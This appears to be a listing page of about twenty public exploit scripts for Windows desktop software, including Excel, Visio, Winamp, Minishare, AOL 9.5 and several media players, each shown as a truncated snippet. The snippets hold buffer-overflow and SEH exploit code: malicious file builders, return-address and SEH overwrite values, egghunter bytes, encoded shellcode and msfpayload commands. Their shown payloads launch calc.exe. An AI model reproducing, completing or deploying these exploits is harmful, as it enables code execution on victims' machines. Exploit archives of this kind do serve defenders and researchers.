Microsoft-Excel-OBJ-Record

Title: Microsoft Excel OBJ Record Stack Overflow Version: Excell 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:36640 str2 = strTotal37440: shellcode calc.exe shellcode =...

DJ-Studio-Pro-8.1.3.2.1

DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" Egg Hunted...

Excel-RTD-Memory-Corruption

Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:4509 str2 = strTotal5013:15000 str3 = strTotal15800: eip = "\xAd\x57\x00\x30" pop pop ret jmp = "\xF7\xC2\x03\x30" call esp...

Acoustica-MP3-Audio-Mixer-2.471

The software doesn't handle correctly M3U's header and extra info when is being imported on a open sound group. Trigger: launch app, open an existing sound group i.eC:\Program Files\Acoustica MP3 Audio Mixer\example.sgp then import the crash.m3u and....KaaaaBooom!! magic = "crash.m3u" vuln =...

Microsoft-Office-Visio-DXF

Title: Microsoft Office Visio DXF File Stack based Overflow Version: Microsoft Office Visio 2002xp Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.dxf', 'rb+' strTotal = fdR.read str1 = strTotal:100 str2 = strTotal1020:1124 str3 = strTotal1128:1169 str4 = strTotal1173:...

Minishare-1.5.5-Buffer-Overflow

Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt Date: 11/02/2010 Author: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare Version: 1.4.0 - 1.5.5 shellcode = "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D" "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"...

Winamp-5.5.8-(in_mod-plugin)

Pwn And Beans by Mighty-D presents: Winamp 5.5.8.2985 inmod plugin Stack Overflow WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet Bug found by http://www.exploit-db.com/exploits/15248/ POC by fdisk header =...

Minishare-1.5.5-BoF

Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt - EggHunter Version Date: 11/19/2010 Author: 0v3r Bug Found By: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...

MP3-Nator-Buffer-Overflow

Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...

DIZzy-1.12-Local

Exploit Title: DIZzy 1.12 Local Stack Overflow Google Dork: n/a Date: 17/11/2010 Author: g30rg3x shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" + "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" + "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" +...

Realtek-HD-Audio-Control-Panel-2.1.3.2

App. has classic buffer overflow vulnerability it can be triggered by passing a too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin" f = openfilepath, "wb" f.write'A'4...

Realtek-Audio-Microphone-Calibration-1.1.1.6

App. has classic buffer overflow vulnerability it can be triggered by passing too long argument as a startup parameter. Shellcode can by run via classic ret overwrite or SEH Handler overwrite filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin" f = openfilepath, "wb" dummy data f.write'\x90'...

Free-CD-to-MP3-Converter-3.1

Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit SEH Date: 10/18/10 Credit/Bug found by: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe filename = 'crash.wav' windows/exec - 144 bytes http://www.metasploit.com Encoder: x86/shikataganai...

BS.Player-2.57-SEH

Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57UNICODE-SEH Date: 01\07\2010 Author: C4SS!0 G0M3S Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 import os import sys import time import string os.system"cls" os.system"color 4f" def usage: iflensys.argv!=3 or...

CoolPlayer-2.18-DEP-Bypass

Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not work on all Win XP SP3 machines windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available shellcode =...

MP3-CD-Converter-Professional-BoF-(SEH)

Exploit Titule: Exploit Buffer Overflow MP3 CD Converter ProfessionalSEH Date: 12/20/2010 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe Version: 5.0.3 import os import sys import struct import time def usage: os.system"cls" os.system"color 4f" print"\n"...

xRadio-0.95b-(.xrl)

xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger...

AOL-9.5-(rtx)-Local-Buffer-Overflow

Bug : AOL 9.5 rtx Local Buffer Overflow Exploit by sup3r Tested on : XP SP3 header1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"...

NetZip-Classic-SEH

Exploit Title: Exploit Buffer Overflow NetZip ClassicSEH Date: 01\30\2011 Author: C4SS!0 G0M3S Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html Version: 7.5.1.86 Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN def usage system"cls" system"color 4f"; end if ARGV.length !=1 usage...

Nokia-Multimedia-Player-1.0

Exploit Title: Nokia Multimedia player SEH Unicode Date: January 11 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html Version: 1.00.55.5010 junk="\x44" 2660 shellcode =...